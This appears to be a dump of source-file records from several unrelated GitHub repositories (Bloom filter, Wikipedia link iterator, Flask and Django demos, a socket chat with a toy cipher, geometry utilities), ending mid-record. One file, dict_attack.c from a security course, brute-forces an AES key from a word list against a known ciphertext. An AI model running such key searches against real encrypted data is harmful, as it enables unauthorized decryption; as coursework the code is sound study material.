time.time() - start\nprint(\"BLOOMCHECK 3 TIME: \", end='')\nprint(end)\n\n\nstart = time.time()\nbloomCheck__5(bloomFilter__5, bloomLength, i)\nend = time.time() - 
start\nprint(\"BLOOMCHECK 5 TIME: \", end='')\nprint(end)\n\ndictionary.close()\ninputFile.close()\nout5.close() \nout3.close()\n\n\n \n\n"
},
{
"alpha_fraction": 0.4712907671928406,
"alphanum_fraction": 0.5140101313591003,
"avg_line_length": 20.760000228881836,
"blob_id": "4735b604926fed829d188e1bef5da7f98da6b494",
"content_id": "57d2a6ef389cd6b3902f82fc40d711edde5c6dd9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2177,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 100,
"path": "/Dictionary-Attack/dict_attack.c",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <openssl/evp.h>\n\n\nvoid handleErrors(void){\n ERR_print_errors_fp(stderr);\n abort();\n}\n\nvoid encrypt(unsigned char *plaintext, int plaintext_len, unsigned char *key, unsigned char *ciphertext){\n EVP_CIPHER_CTX *ctx;\n\n int len;\n\n\n if(!(ctx = EVP_CIPHER_CTX_new())){\n printf(\"error\\n\");\n }\n\n if(1 != EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, 0000000000000000)){\n printf(\"error\\n\");\n }\n\n if(1 != EVP_EncryptUpdate(ctx, ciphertext, &len, plaintext, plaintext_len)){\n printf(\"error\\n\");\n }\n\n if(1 != EVP_EncryptFinal_ex(ctx, ciphertext + len, &len)){\n printf(\"error\\n\");\n }\n\n EVP_CIPHER_CTX_free(ctx);\n\n}\n\nvoid string2hexString(char* input, char* output){\n int loop;\n int i; \n \n i=0;\n loop=0;\n \n int temp=0;\n while(input[loop] != '\\0')\n {\n temp = (int) input[loop];\n if (temp < 0){\n temp = (128 - abs(temp) ) + 128;\n\n }\n sprintf((char*)(output+i),\"%02x\", temp);\n loop+=1;\n i+=2;\n }\n output[i++] = '\\0';\n}\n\n\nint main(){\n FILE * stream;\n char * key = NULL;\n ssize_t buffer = 0;\n ssize_t read;\n\n stream = fopen(\"words.txt\", \"r\");\n\n unsigned char *plaintext= \"This is a top secret.\";\n unsigned char ciphertext[128];\n\n while ((read = getline(&key, &buffer, stream)) != -1) { \n strtok(key, \"\\n\");\n int addZero = 16 - strlen(key);\n if (addZero > 0){\n int count = 0;\n while (count < addZero){\n strncat(key, \" \", 1); \n count ++;\n }\n }\n\n int ciphertext_len;\n encrypt(plaintext, strlen ((char *)plaintext), key, ciphertext);\n \n char hex_str[64+1];\n string2hexString(ciphertext, hex_str);\n\n char * ciphertextMain = \"8d20e5056a8d24d0462ce74e4904c1b513e10d1df4a2ef2ad4540fae1ca0aaf9\";\n \n if (strcmp(hex_str,ciphertextMain) == 0){\n printf(\"************FOUND KEY**************\\n\");\n printf(\" KEY: '%s'\\n\", key);\n return 0;\n }\n\n }\n fclose(stream);\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.7643312215805054,
"alphanum_fraction": 0.774946928024292,
"avg_line_length": 57.875,
"blob_id": "6d6845a6fa361cccbef21f307d4daffe3372fab0",
"content_id": "e73affcd7ed6bee6b4e4b52d77e4a932604c2958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 471,
"license_type": "no_license",
"max_line_length": 317,
"num_lines": 8,
"path": "/Bloom Filter/README.md",
"repo_name": "lekevin678/Intro-to-Security",
"src_encoding": "UTF-8",
"text": "# Bloom Filter\n\nCreates two Bloom Filter with a list of words in a dictionary. One Bloom Filter uses 3 hash functions while the other uses 5. Program will test an input file with a list of words to see if a word is either not in the Bloom Filter or if it might be in the Bloom Filter (might due to the posibility of false positives).\n\nCompile and Run:\npython3 bloom_filter.py -d dictionary.txt -i input.txt -o output3.txt output5.txt\n\nSkills: Python, Bloom Filters, Hash\n"
}
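The false-positive behavior this README mentions follows the standard Bloom-filter estimate (1 - e^(-kn/m))^k, with m = 2364657 bits hard-coded in `bloom_filter.py`. The dictionary size n below is an assumed value for illustration, since it depends on the `dictionary.txt` shipped with the repo:

```python
import math

m = 2364657          # filter size taken from bloom_filter.py
n = 100000           # assumed dictionary size (illustrative only)

for k in (3, 5):     # the two filters built by the script
    p = (1 - math.exp(-k * n / m)) ** k
    print('k=%d -> false-positive rate ~ %.4f%%' % (k, p * 100))
```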
] | 8 |
pluxury8state/Yield
|
https://github.com/pluxury8state/Yield
|
a0078b72119f1247ff9441c0133feba8c6785891
|
c2cae9eb47ef3dfcd96b41de6a40aa625f2d8b8f
|
4143e2182d73e666d6e497720959beb318bac8d5
|
refs/heads/master
| 2022-11-09T13:33:13.239553 | 2020-06-25T14:16:25 | 2020-06-25T14:16:25 | 274,934,476 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5815061926841736,
"alphanum_fraction": 0.586272656917572,
"avg_line_length": 20.85416603088379,
"blob_id": "3d403f76f4c297fff9d14249905c169637b25926",
"content_id": "f2e72653ea507a38a45f4c69bb538a6c4f7968d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1049,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 48,
"path": "/search_country.py",
"repo_name": "pluxury8state/Yield",
"src_encoding": "UTF-8",
"text": "from requests import get\nimport json\nfrom pprint import pprint\n\n\ndef convert(file):\n mas = []\n for item in file:\n a = item['name']['common'].replace(' ','_')\n mas.append(a)\n return mas\n\n\nclass ITERATOR:\n\n def __init__(self, file=str):\n self.file = file\n with open(self.file) as inform:\n self.json_load = json.load(inform)\n self.countries = convert(self.json_load)\n self.counter = -1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n url = 'https://ru.wikipedia.org/wiki/'\n if self.counter == len(self.countries)-1:\n raise StopIteration\n self.counter += 1\n\n dictionary = {}\n\n dictionary['name'] = self.countries[self.counter]\n dictionary['link'] = url + self.countries[self.counter]\n\n return dictionary\n\n\nobj = ITERATOR('countries.json')\n\nmas = []\n\nfor items in obj:\n mas.append(items)\n\nwith open('new_links.json', 'w', encoding='utf8') as file:\n json.dump(mas, file, ensure_ascii=False, indent=2)\n"
},
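The hand-rolled iterator above (an explicit `__iter__`/`__next__` pair plus a counter) can be written more idiomatically as a generator, in keeping with the repo's name. A sketch assuming the same `countries.json` layout:

```python
import json

def country_links(path, base_url='https://ru.wikipedia.org/wiki/'):
    """Generator equivalent of the ITERATOR class above."""
    with open(path) as fh:
        data = json.load(fh)
    for item in data:
        name = item['name']['common'].replace(' ', '_')
        yield {'name': name, 'link': base_url + name}

# mas = list(country_links('countries.json'))
```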
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6081300973892212,
"avg_line_length": 21.703702926635742,
"blob_id": "9dd0de4545d1128a480e50ac823f4eb96cb1e0a7",
"content_id": "42c5dad10774957b525d354ee9808944c4d1893a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 639,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 27,
"path": "/hash_generator.py",
"repo_name": "pluxury8state/Yield",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport json\n\ndef open_file(file_i):\n json_file = None\n with open(str(file_i),encoding='utf8') as file_to_hash:\n json_file = json.load(file_to_hash)\n return json_file\n\ndef hash_file(object):\n\n mas = {}\n counter = 0\n for item in object:\n mas['name'] = item['name']\n hash_object = hashlib.md5(bytes(str(item['link']), encoding='utf8'))\n mas['hash_link'] = hash_object.hexdigest()\n yield mas\n counter += 1\n print(f'всего строк было обработано:{counter}')\n\n\n\nfile = open_file('new_links.json')\n\nfor item in hash_file(file):\n print(item)\n\n\n"
}
] | 2 |
bbuchanan208/VerveDemo
|
https://github.com/bbuchanan208/VerveDemo
|
09212293457cd6256cc979ddeafeabd2b41cf6b6
|
8c09eaef29de2347dd8a5a97d842b579c04d3cda
|
56a026fff3737b556c904ccbdec6bb58601ba8d7
|
refs/heads/master
| 2023-05-26T06:56:49.216061 | 2021-06-17T18:05:11 | 2021-06-17T18:05:11 | 377,591,190 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6087613105773926,
"alphanum_fraction": 0.6208459138870239,
"avg_line_length": 24.960784912109375,
"blob_id": "17326dd1f8e3cb4a2dc50493c68a1b1884098eba",
"content_id": "b035fa29aa9278ef04b2a74dc88e5912736567ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1324,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 51,
"path": "/application.py",
"repo_name": "bbuchanan208/VerveDemo",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template\n\n# AWS sometimes likes \"application\" instead of \"app\", using both makes for less headaches\napp = application = Flask(__name__)\n\n\[email protected]('/')\ndef home():\n return render_template('index.html')\n\n\n# Normally I wouldn't create three separate routes, but this will allow me to link the pages with the buttons and no\n# additional arguments\[email protected]('/full')\ndef full():\n context = {\n \"battery_percent\": 100,\n \"hours_remaining\": \"12\",\n \"minutes_remaining\": \"00\",\n \"firmware_needs_update\": False,\n \"maintenance_needed\": False,\n }\n return render_template('dashboard.html', context=context)\n\n\[email protected]('/low')\ndef low():\n context = {\n \"battery_percent\": 20,\n \"hours_remaining\": \"2\",\n \"minutes_remaining\": \"24\",\n \"firmware_needs_update\": True,\n \"maintenance_needed\": False,\n }\n return render_template('dashboard.html', context=context)\n\n\[email protected]('/very_low')\ndef very_low():\n context = {\n \"battery_percent\": 6,\n \"hours_remaining\": \"0\",\n \"minutes_remaining\": \"43\",\n \"firmware_needs_update\": True,\n \"maintenance_needed\": True,\n }\n return render_template('dashboard.html', context=context)\n\n\nif __name__ == '__main__':\n application.run(debug=False)\n"
},
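Because the three dashboard routes above differ only in their hard-coded `context` dicts, they are easy to exercise with Flask's built-in test client. A minimal sketch, assuming it runs next to `application.py` and the repo's templates:

```python
# Sketch: assumes this file sits beside application.py and its templates/.
from application import app

with app.test_client() as client:
    for route in ('/', '/full', '/low', '/very_low'):
        response = client.get(route)
        print(route, response.status_code)  # expect 200 for each route
```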
{
"alpha_fraction": 0.7680000066757202,
"alphanum_fraction": 0.7680000066757202,
"avg_line_length": 40.66666793823242,
"blob_id": "1ba488a709945e863c9d07ea5b211602b6f326b8",
"content_id": "5f3caaaefdec03eb1876dd4c9dc853170d8368dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 125,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 3,
"path": "/README.md",
"repo_name": "bbuchanan208/VerveDemo",
"src_encoding": "UTF-8",
"text": "# VerveDemo\n\nA quick, simple flask application to get the attention of the folks at [Verve Motion](https://vervemotion.com/)\n"
}
] | 2 |
vidalchile/usuarios-django
|
https://github.com/vidalchile/usuarios-django
|
81488b66e309da6ef6800c716e1d5305a283ae43
|
32637fbba248f2bbf927bc76eb28ebcdf3a5002b
|
48b21ef14752b46fbcd6f1fb039dc1e686d63b15
|
refs/heads/master
| 2023-01-14T16:11:55.452672 | 2020-11-03T02:16:11 | 2020-11-03T02:16:11 | 297,802,800 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6062864661216736,
"alphanum_fraction": 0.6130914092063904,
"avg_line_length": 28.95145606994629,
"blob_id": "fef0c7a90bdbfe07ebc75b6053b911ec56f3e1a0",
"content_id": "f6bc38aef73525a2cc4e3f745fbb690a19f01b1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3097,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 103,
"path": "/usuarios/applications/users/forms.py",
"repo_name": "vidalchile/usuarios-django",
"src_encoding": "UTF-8",
"text": "from django import forms\n\nfrom .models import User\n\nfrom django.contrib.auth import authenticate\n\nclass UserRegisterForm(forms.ModelForm):\n \n password1 = forms.CharField( \n label='Contraseña',\n required=True, \n max_length=32,\n widget=forms.PasswordInput(attrs={'placeholder': 'Ingresar una contraseña'})\n )\n\n password2 = forms.CharField(\n label='Repetir Contraseña',\n required=True,\n max_length=32, \n widget=forms.PasswordInput(attrs={'placeholder': 'Repetir contraseña'})\n )\n\n class Meta:\n model = User\n # muestra solo algunos campos del modelo\n fields = (\n 'username',\n 'email',\n 'nombres',\n 'apellidos',\n 'genero',\n 'password1',\n 'password2',\n )\n \n def clean_password2(self):\n if len(self.cleaned_data['password1']) < 5:\n self.add_error('password1', 'Las contraseña debe tener mas de 5 digitos')\n elif self.cleaned_data['password1'] != self.cleaned_data['password2']:\n self.add_error('password2', 'Las contraseñas no son iguales')\n\n\nclass LoginForm(forms.Form):\n \n username = forms.CharField( \n label='username',\n required=True, \n widget=forms.TextInput(attrs={'placeholder': 'Username'})\n )\n\n password = forms.CharField( \n label='Contraseña',\n required=True, \n max_length=32,\n widget=forms.PasswordInput(attrs={'placeholder': 'Ingresar contraseña'})\n )\n\n # django sabe que es una de las primeras funciones que tiene que ejecutar\n def clean(self):\n cleaned_data = super(LoginForm, self).clean()\n username = self.cleaned_data['username']\n password = self.cleaned_data['password']\n\n if not authenticate(username=username, password=password):\n raise forms.ValidationError('Los datos de usuario no son correctos')\n return cleaned_data\n\n\nclass UpdatePasswordForm(forms.Form):\n \n password_actual = forms.CharField( \n label='Contraseña Actual',\n required=True, \n widget=forms.PasswordInput(attrs={'placeholder': 'Contraseña Actual'})\n )\n\n password_nueva = forms.CharField( \n label='Contraseña Nueva',\n required=True, \n max_length=32,\n widget=forms.PasswordInput(attrs={'placeholder': 'Contraseña Nueva'})\n )\n\n\nclass VerificationForm(forms.Form):\n \n codigo_registro = forms.CharField(required=True)\n\n def __init__(self, pk, *args, **kwargs):\n self.id_user = pk\n super(VerificationForm, self).__init__(*args, **kwargs)\n \n def clean_codigo_registro(self):\n codigo = self.cleaned_data['codigo_registro']\n\n if len(codigo) != 6:\n raise forms.ValidationError('el codigo es incorrecto')\n \n # verificar si el codigo y el id de usuario son validos:\n usuario_activo = User.objects.cod_validation(self.id_user, codigo)\n\n if not usuario_activo:\n raise forms.ValidationError('el codigo es incorrecto')\n\n"
},
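Forms like these are normally driven from a view: bind the POST data, let the `clean_*`/`clean` hooks run, then branch on validity. A sketch of that flow for `LoginForm`; the view name, template path, and redirect target are illustrative, not from the repo:

```python
from django.contrib.auth import authenticate, login
from django.shortcuts import redirect, render

def login_view(request):  # hypothetical view name
    form = LoginForm(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        # form.clean() has already verified the credentials via authenticate()
        user = authenticate(username=form.cleaned_data['username'],
                            password=form.cleaned_data['password'])
        login(request, user)
        return redirect('home')  # illustrative URL name
    return render(request, 'users/login.html', {'form': form})
```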
{
"alpha_fraction": 0.8199999928474426,
"alphanum_fraction": 0.8199999928474426,
"avg_line_length": 24,
"blob_id": "866afd11fe5aab050a45e4de4dd89fd1eff4e430",
"content_id": "d6ac9d06f74b559ac376f84e583d1e57abdb004d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "vidalchile/usuarios-django",
"src_encoding": "UTF-8",
"text": "# usuarios-django\nProyecto de la sección usuarios\n"
},
{
"alpha_fraction": 0.7559808492660522,
"alphanum_fraction": 0.760765552520752,
"avg_line_length": 29,
"blob_id": "265b4f860d6e4eaef96473e7fd04e776b33c3e36",
"content_id": "e4d0420e5ef041defd41d361821b878c01c4a28b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 7,
"path": "/usuarios/applications/users/functions.py",
"repo_name": "vidalchile/usuarios-django",
"src_encoding": "UTF-8",
"text": "# funciones extras para mi aplicación users\n\nimport random\nimport string\n\ndef code_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))"
}
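The helper above produces codes like the 6-character registration code that `VerificationForm` checks; for example:

```python
codigo = code_generator()        # e.g. 'N0QD4Z': 6 random chars from A-Z, 0-9
assert len(codigo) == 6
largo = code_generator(size=10)  # the length is configurable
assert len(largo) == 10
```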
] | 3 |
grupo10basaezsilva/websocket
|
https://github.com/grupo10basaezsilva/websocket
|
d3205ad5bcf05eea466f26b281d50174e8468cd2
|
9f7ec5486045fa41430b098fb2349aa3d82a1c90
|
b2915ca7c37862fed98dc964bc1be58bd165c8a3
|
refs/heads/main
| 2023-01-09T09:13:52.138411 | 2020-11-07T01:51:30 | 2020-11-07T01:51:30 | 310,467,228 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6264591217041016,
"alphanum_fraction": 0.6451361775398254,
"avg_line_length": 24.8125,
"blob_id": "8f60abefaf5745e1ad239c905e825e68b6dbdea7",
"content_id": "696e8c9054a9670ab97e3a5b6e69e65938ac033b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1289,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 48,
"path": "/client.py",
"repo_name": "grupo10basaezsilva/websocket",
"src_encoding": "UTF-8",
"text": "import socket\r\n\r\nfrom uuid import getnode as get_mac\r\n\r\nHEADER = 64\r\nPORT = 3074\r\nSERVER = '158.251.91.68'\r\nADDR = (SERVER, PORT)\r\nFORMAT = 'utf-8'\r\nDISCONNECT_MESSAGE = 'DISCONNECT!'\r\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nclient.connect(ADDR)\r\n\r\ndef send(msg):\r\n #Con get_mac() sacamos la MAC del cliente en formato INT\r\n #con str() se trasforma a string y\r\n #se concatena con el mensaje deseado:\r\n mensajeCifrado = cifrador(msg)\r\n msg = str(get_mac()) + mensajeCifrado\r\n\r\n message = msg.encode(FORMAT)\r\n\r\n # Obtener largo mensaje:\r\n msg_length = len(message)\r\n # Codificar en UTF-8 el largo del mensaje:\r\n send_length = str(msg_length).encode(FORMAT)\r\n # Se le agrega\r\n send_length += b' ' * (HEADER - len(send_length))\r\n # Acá se envía el largo:\r\n client.send(send_length)\r\n # Y acá el mensaje.\r\n client.send(message)\r\n # Confirmación de mensaje enviado\r\n print(client.recv(2048).decode(FORMAT))\r\n \r\ndef cifrador(mensajePlano):\r\n mensajeCifrado = \"\"\r\n for x in range(0, 5):\r\n for y in range(x, len(mensajePlano), 5):\r\n mensajeCifrado += mensajePlano[y]\r\n return mensajeCifrado\r\n\r\n# Mensajes a enviar:\r\nsend('hello')\r\ninput()\r\nsend('asdfasdf')\r\ninput()\r\nsend(DISCONNECT_MESSAGE)"
},
{
"alpha_fraction": 0.5653241872787476,
"alphanum_fraction": 0.5957760214805603,
"avg_line_length": 31.37704849243164,
"blob_id": "cd454b3d267a3c7d7f23d365444d95fbd1ddbdea",
"content_id": "81314c6d0c3474c27cc7bd749a7137a466b53170",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2038,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 61,
"path": "/server.py",
"repo_name": "grupo10basaezsilva/websocket",
"src_encoding": "UTF-8",
"text": "import socket\r\nimport threading\r\n\r\nHEADER = 64\r\nPORT = 3074\r\nSERVER = '158.251.91.68'\r\nADDR = (SERVER, PORT)\r\nFORMAT = 'utf-8'\r\nDISCONNECT_MESSAGE = 'DISCONNECT!'\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n#Se agrega la variable macHandshake que contiene las MAC de los clientes permitidos\r\nmacHandshake1 = '40271575130816' #Manuel\r\nmacHandshake2 = '62488678593688' #Franco\r\n\r\nserver.bind(ADDR)\r\n\r\ndef handle_client(conn, addr):\r\n print(f\"[NEW CONNECTION] {addr} connected.\")\r\n connected = True\r\n while connected:\r\n msg_length = conn.recv(HEADER).decode(FORMAT)\r\n if msg_length:\r\n msg_length = int(msg_length)\r\n msg = conn.recv(msg_length).decode(FORMAT)\r\n mac = msg[0:14]\r\n #La solución puede ser mejorada, pero funciona!\r\n while mac != macHandshake1 and mac != macHandshake2:\r\n print('CLIENTE RECHAZADO')\r\n server.close()\r\n server.shutdown(1)\r\n if msg[14:] == DISCONNECT_MESSAGE:\r\n connected = False\r\n #Acá se muestra el mensaje:\r\n msjCifrado = msg[14:]\r\n msjDecifrado = decifrador(msjCifrado);\r\n print(f\"[{addr}][{mac}] {msjDecifrado}\")\r\n conn.send(\"Msg received\".encode(FORMAT))\r\n conn.close()\r\n\r\ndef start():\r\n server.listen()\r\n print(f\"[LISTEN] Server is listening on address {ADDR}\")\r\n while True:\r\n conn, addr = server.accept()\r\n thread = threading.Thread(target=handle_client, args=(conn, addr))\r\n thread.start()\r\n counter=threading.activeCount()\r\n print(f\"[ACTIVE CONNECTIONS] {counter - 1}\")\r\n\r\ndef decifrador(mensajeCifrado):\r\n mensajeDecifrado = [\"\"] * len(mensajeCifrado)\r\n #Variable aux\r\n i = 0\r\n for x in range(0, 5):\r\n for y in range(x, len(mensajeDecifrado), 5):\r\n mensajeDecifrado[y] = mensajeCifrado[i]\r\n i += 1\r\n return ''.join(mensajeDecifrado)\r\n\r\nprint(\"[STARTING] server is running.....\")\r\nstart()\r\n"
}
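`cifrador` (client) and `decifrador` (server) implement a simple 5-column transposition: encryption reads the message by columns (position mod 5), decryption writes the characters back into place. A quick round-trip check of the pair defined above:

```python
msg = 'attack at dawn'
enc = cifrador(msg)      # from client.py above
dec = decifrador(enc)    # from server.py above
assert dec == msg        # the transposition is its own inverse pair
print(repr(enc), '->', repr(dec))
```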
] | 2 |
optas/geo_tool
|
https://github.com/optas/geo_tool
|
84a63c8dd9e9881234737a816a2a5b119e4368eb
|
7eda787b4b9361ee6cb1601a62495d9d5c3605e6
|
4cd4e5c39523f5889efb676414c5f4e58bc38991
|
refs/heads/master
| 2022-02-26T18:03:09.930737 | 2022-01-23T03:19:46 | 2022-01-23T03:19:46 | 67,737,034 | 7 | 3 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6334841847419739,
"alphanum_fraction": 0.6606335043907166,
"avg_line_length": 21.100000381469727,
"blob_id": "61a76f6ba38241ffedbe671ae4438dfc0ae0ae8b",
"content_id": "54bfa5f89e69b8f8946df5994b259d109e6ff325",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 221,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 10,
"path": "/scripts/Test_Cases.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 14, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\n\nimport numpy as np\n"
},
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6661441922187805,
"avg_line_length": 30.27450942993164,
"blob_id": "42454c87ce0ce902a259c994b0c44a50ca4ae627",
"content_id": "5e6b86b7414e944d946787cdf2465afba0050baf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3190,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 102,
"path": "/utils/linalg_utils.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nimport scipy.sparse as sps\nimport warnings\nfrom numpy.linalg import matrix_rank\n\nl2_norm = np.linalg.norm\n\n\ndef is_close(a, b, atol=0):\n sp_a = sps.issparse(a)\n sp_b = sps.issparse(b)\n if sp_a and sp_b:\n return (abs(a - b) > atol).nnz == 0\n elif not sp_a and not sp_b:\n return (np.allclose(a, b, atol=atol))\n else:\n return (abs(a - b) <= atol).all()\n\n\ndef is_symmetric(array, tolerance=10e-6):\n if sps.issparse(array):\n return (abs(array - array.T) > tolerance).nnz == 0\n else:\n return np.allclose(array, array.T, atol=tolerance, rtol=0)\n\n\ndef is_finite(array):\n if sps.issparse(array):\n array = array.tocoo().data\n return np.isfinite(array).all()\n\n\ndef is_orthogonal(array, axis=1, tolerance=10e-6):\n ''' axis - (optional, 0 or 1, default=1). If 0 checks for orthogonality of rows, else of columns.\n '''\n if axis == 0:\n gram_matrix = array.dot(array.T)\n else:\n gram_matrix = array.T.dot(array)\n\n if sps.issparse(gram_matrix):\n gram_matrix = gram_matrix.todense()\n np.fill_diagonal(gram_matrix, 0)\n return np.allclose(gram_matrix, np.zeros_like(gram_matrix), atol=tolerance, rtol=0)\n\n\ndef is_square_matrix(array):\n return array.ndim == 2 and array.shape[0] == array.shape[1]\n\n\ndef is_increasing(l):\n return all(l[i] <= l[i + 1] for i in xrange(len(l) - 1))\n\n\ndef is_decreasing(l):\n return all(l[i] >= l[i + 1] for i in xrange(len(l) - 1))\n\n\ndef order_of_elements_after_deletion(num_elements, delete_index):\n '''\n Assuming a sequence of num_elements index in [0-num_elements-1] and a list of indices to be deleted from the sequence,\n creates the mapping from the remaining elements to their position in the new list created after the deletion takes place.\n '''\n delete_index = np.unique(delete_index)\n init_list = np.arange(num_elements)\n after_del = np.delete(init_list, delete_index)\n return {key: i for i, key in enumerate(after_del)}\n\n\ndef are_coplanar(points):\n return matrix_rank(points) > 2\n\n\ndef accumarray(subs, val):\n ''' Matlab inspired function.\n A = accumarray(subs,val) returns array A by accumulating elements of vector\n val using the subscripts subs. If subs is a column vector, then each element\n defines a corresponding subscript in the output, which is also a column vector.\n The accumarray function collects all elements of val that have identical subscripts\n in subs and stores their sum in the location of A corresponding to that\n subscript (for index i, A(i)=sum(val(subs(:)==i))).\n '''\n return np.bincount(subs, weights=val)\n\n\ndef sort_spectra(evals, evecs, transformer=None):\n if transformer is None:\n index = np.argsort(evals) # Sort evals from smallest to largest\n else:\n index = np.argsort(transformer(evals)) # Sort evals from smallest to largest\n evals = evals[index]\n evecs = evecs[:, index]\n assert(is_increasing(evals))\n return evals, evecs\n"
},
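The Matlab-style `accumarray` above is simply `np.bincount` with weights; a short example of the behavior its docstring describes:

```python
import numpy as np
# accumarray as defined in linalg_utils.py above

subs = np.array([0, 1, 0, 2, 1])
vals = np.array([10., 20., 5., 1., 2.])
print(accumarray(subs, vals))   # [15. 22.  1.]: sums vals sharing a subscript
```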
{
"alpha_fraction": 0.6461169123649597,
"alphanum_fraction": 0.6509207487106323,
"avg_line_length": 38.03125,
"blob_id": "a22da43efc07fb6bcd1cf2c7707761ec3a7d5267",
"content_id": "b81de8a37f103e145aaaab291ea2aab0a93b47a4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1249,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 32,
"path": "/scripts/mesh_lab_wrapper.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''Created on June 14, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes.\n'''\n\n\nfrom subprocess import call as sys_call\nfrom os import path as osp\nfrom general_tools.in_out.basics import files_in_subdirs, copy_folder_structure\n\nmesh_lab_binary = '/Applications/meshlab.app/Contents/MacOS/meshlabserver'\n\n\ndef apply_script_to_files(top_folder, out_top_dir, script_file, regex='.off$'):\n input_files = files_in_subdirs(top_folder, regex)\n copy_folder_structure(top_folder, out_top_dir)\n for in_f in input_files:\n out_f = osp.join(out_top_dir, in_f.replace(top_folder, ''))\n sys_call([mesh_lab_binary, '-i', in_f, '-o', out_f, '-s', script_file])\n\n\ndef convert_to_obj(top_folder, out_top_dir, do_nothing_mlx, regex='.off$'):\n input_files = files_in_subdirs(top_folder, regex)\n copy_folder_structure(top_folder, out_top_dir)\n for in_f in input_files:\n out_f = osp.join(out_top_dir, in_f.replace(top_folder, ''))\n out_f = out_f[:-len('off')] # TODO -> works only for .off\n out_f = out_f + 'obj'\n sys_call([mesh_lab_binary, '-i', in_f, '-o', out_f, '-s', do_nothing_mlx])\n"
},
{
"alpha_fraction": 0.6509009003639221,
"alphanum_fraction": 0.6734234094619751,
"avg_line_length": 26.75,
"blob_id": "d10cb26f34d67ee106aeccd66aab2022255d5d00",
"content_id": "9785ab2c55a455d7611407862b32c6c04b813332",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 16,
"path": "/private/consider.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 21, 2016.\nKeep things that you will consider to include in main library.\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes.\n'''\n\nfrom mayavi import mlab as mayalab\n\n\ndef plot_vector_field(points, vx, vy, vz):\n mayalab.quiver3d(points[:, 0], points[:, 1], points[:, 2], vx, vy, vz)\n mayalab.show()\n"
},
{
"alpha_fraction": 0.6174121499061584,
"alphanum_fraction": 0.6224707365036011,
"avg_line_length": 38.95744705200195,
"blob_id": "e9e097618072e54a23e1ab71bd7852f3953df162",
"content_id": "38a1e0cfe662e939b83d30b2d1f7551ffe339a0c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3756,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 94,
"path": "/rendering/back_tracer.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
